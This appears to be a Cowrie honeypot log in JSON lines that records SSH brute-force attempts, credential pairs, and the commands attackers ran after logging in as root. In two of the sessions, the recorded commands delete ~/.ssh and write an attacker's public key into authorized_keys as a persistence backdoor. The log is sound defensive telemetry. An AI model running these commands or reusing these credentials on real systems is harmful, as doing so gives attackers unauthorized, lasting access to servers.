{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:38:12.112319Z","src_ip":"212.227.235.229","session":"5324dfce3ec0"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password123","message":"login attempt [deployer/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:38:12.469804Z","src_ip":"212.227.235.229","session":"5324dfce3ec0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:13.551148Z","src_ip":"212.227.235.229","session":"5324dfce3ec0"}
{"eventid":"cowrie.session.connect","src_ip":"173.187.108.55","src_port":48058,"dst_ip":"1.2.3.4","dst_port":23,"session":"d5de32c4791d","protocol":"telnet","message":"New connection: 173.187.108.55:48058 (1.2.3.4:23) [session: d5de32c4791d]","sensor":"my-vps","timestamp":"2025-09-09T05:38:17.808630Z"}
{"eventid":"cowrie.session.closed","duration":13.452288150787354,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:31.260855Z","src_ip":"173.187.108.55","session":"d5de32c4791d"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":58580,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b3f8a0a1e4","protocol":"ssh","message":"New connection: 213.6.203.226:58580 (1.2.3.4:22) [session: e2b3f8a0a1e4]","sensor":"my-vps","timestamp":"2025-09-09T05:38:45.947675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:38:45.949661Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.018088Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.login.success","username":"root","password":"zmxncbv","message":"login attempt [root/zmxncbv] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.339529Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:38:46.500014Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.500968Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.502208Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.572910Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:38:46.835398Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.836298Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.907272Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.908134Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":34067,"dst_ip":"1.2.3.4","dst_port":22,"session":"01e15a36e557","protocol":"ssh","message":"New connection: 213.6.203.226:34067 (1.2.3.4:22) [session: 01e15a36e557]","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.974816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:38:46.975632Z","src_ip":"213.6.203.226","session":"01e15a36e557"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:38:47.047036Z","src_ip":"213.6.203.226","session":"01e15a36e557"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:38:47.368717Z","src_ip":"213.6.203.226","session":"01e15a36e557"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.445520Z","src_ip":"213.6.203.226","session":"01e15a36e557"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":38342,"dst_ip":"1.2.3.4","dst_port":22,"session":"104989f8ba06","protocol":"ssh","message":"New connection: 213.6.203.226:38342 (1.2.3.4:22) [session: 104989f8ba06]","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.512351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.513032Z","src_ip":"213.6.203.226","session":"104989f8ba06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.586757Z","src_ip":"213.6.203.226","session":"104989f8ba06"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.912045Z","src_ip":"213.6.203.226","session":"104989f8ba06"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.981727Z","src_ip":"213.6.203.226","session":"e2b3f8a0a1e4"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:38:48.982605Z","src_ip":"213.6.203.226","session":"104989f8ba06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34410,"dst_ip":"1.2.3.4","dst_port":22,"session":"e896b8ac5254","protocol":"ssh","message":"New connection: 212.227.235.229:34410 (1.2.3.4:22) [session: e896b8ac5254]","sensor":"my-vps","timestamp":"2025-09-09T05:39:10.625934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:10.630129Z","src_ip":"212.227.235.229","session":"e896b8ac5254"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:10.832402Z","src_ip":"212.227.235.229","session":"e896b8ac5254"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-09T05:39:11.783291Z","src_ip":"212.227.235.229","session":"e896b8ac5254"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:12.960797Z","src_ip":"212.227.235.229","session":"e896b8ac5254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55378,"dst_ip":"1.2.3.4","dst_port":22,"session":"6536bfc4fad1","protocol":"ssh","message":"New connection: 212.227.235.229:55378 (1.2.3.4:22) [session: 6536bfc4fad1]","sensor":"my-vps","timestamp":"2025-09-09T05:39:15.763948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:15.764842Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:15.845415Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw@","message":"login attempt [root/1qazxsw@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.210971Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:39:16.426939Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.427716Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.429395Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.512783Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:39:16.692250Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.693033Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.775810Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.776784Z","src_ip":"212.227.235.229","session":"6536bfc4fad1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55380,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce46174d09e5","protocol":"ssh","message":"New connection: 212.227.235.229:55380 (1.2.3.4:22) [session: ce46174d09e5]","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.854444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.855382Z","src_ip":"212.227.235.229","session":"ce46174d09e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:39:16.935848Z","src_ip":"212.227.235.229","session":"ce46174d09e5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:39:17.298920Z","src_ip":"212.227.235.229","session":"ce46174d09e5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.381505Z","src_ip":"212.227.235.229","session":"ce46174d09e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55394,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d0193250857","protocol":"ssh","message":"New connection: 212.227.235.229:55394 (1.2.3.4:22) [session: 0d0193250857]","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.460465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:39:18.461243Z","src_ip":"212.227.235.229","session":"0d0193250857"}
